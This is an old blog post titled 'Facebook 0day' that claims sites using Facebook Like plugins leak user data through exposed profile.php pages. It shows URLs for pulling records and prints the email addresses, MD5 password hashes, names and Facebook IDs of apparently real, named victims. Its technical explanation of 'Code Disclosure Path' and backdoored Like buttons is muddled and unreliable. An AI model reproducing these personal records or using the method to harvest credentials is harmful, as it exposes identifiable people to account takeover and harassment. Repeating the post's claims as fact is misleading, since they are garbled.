Tuesday, June 11, 2013

Facebook 0day

Milan Patel on 12:33 AM

    ########################################################################
    # Title: Exploit Facebook Via External Plugins and Modules  
    # Exploitation: Manually (use your brain ^_^)
    # Date:  28/03/2013
    # Greetz: Milan Patel , Pro R0ot , Th3 Destroy3r , & all Haxor
    # Author: Mauritania Attacker
    #########################################################################
    For Example my victim is =======>>>  https://www.facebook.com/gaturro22    
    How i could be able to retrieve his password ? easy
    Proof of Concept : Facebook Id ====>>> gaturro22
    P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
    So as you can see we got the email & the password :
    email: gonza.la22@gmail.com
    password: e10adc3949ba59abbe56e057f20f883e
    Another Demo : http://www.salondaddy.com/profile.php?ID=85
    So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever
    It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are
    backdoored with a javascript malware that can sniff all your informations ^_^
    So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites
    especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!
    So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users ^_^ no doubt , just use your brain !
    Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top
    Check this :  [NickName] => orso44  ===========>>> add this to www.facebook.com
    http://www.facebook.com/orso44   ============>>> Facebook Profile
    [Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5
    Another Victim :  ==========>>> https://www.facebook.com/kornberg
    Infos Retrieved :
                        [_iProfileID] => 7893
                        [_aProfile] => Array
                            (
                                [datafile] => 1
                                [ID] => 7893
                                [NickName] => Kornberg
                                [Email] => anselmpennell435@yahoo.com
                                [Password] => 087fbfdeb33dae28260cfdb8f2d8a787
                                [Status] => Active
                                {
                                "id": "862420463",
                                "name": "Zoe Kornberg",
                                "first_name": "Zoe",
                                "last_name": "Kornberg",
                                "username": "kornberg",
                                "gender": "female",
                                "locale": "en_US"
                                }
    Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand
    I just selected  this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)